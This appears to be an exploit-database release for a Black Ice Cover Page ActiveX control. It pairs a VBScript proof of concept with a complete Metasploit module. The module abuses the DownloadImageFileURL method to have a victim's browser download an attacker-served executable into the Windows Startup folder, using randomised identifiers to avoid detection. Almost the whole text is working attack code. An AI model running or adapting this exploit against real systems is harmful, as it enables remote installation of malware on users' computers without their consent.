<html> Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit <!-- RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False vendor: http://www.blackice.com/ software link: http://www.blackice.com/DownloadForms/downloadformimp.asp?product=Cover+Page+Generator --> <object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='target' ></object> <script language='vbscript'> arg1="http://www.google.com/robots.txt" arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt" target.DownloadImageFileURL arg1 ,arg2 </script> </html> # MSF Module ## # $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, :vuln_test => nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download', 'Description' => %q{ This module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me' ], 'Version' => '$Revision: 12540 $', 'References' => [ [ 'CVE', '?'], [ 'OSVDB', '?'], [ 'URL', '?' ], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 20 2011')) register_options( [ OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\']), ], self.class) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) payload_url = "http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload" if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # random junk vname = rand_text_alpha(rand(100) + 1) exe = rand_text_alpha(rand(20) + 1) clsid = "79956462-F148-497F-B247-DF35A095F80B" blackice = rand_text_alpha(rand(100) + 1) method = "DownloadImageFileURL" arg1 = rand_text_alpha(rand(100) + 1) arg2 = rand_text_alpha(rand(100) + 1) content = <<-EOS <html> <object classid='clsid:#{clsid}' id='#{blackice}' ></object> <script language='vbscript'> #{arg1} = "#{payload_url}" #{arg2} = "#{datastore['PATH']}#{exe}.exe" #{blackice}.#{method} #{arg1}, #{arg2} </script> </html> EOS print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) handler(cli) end end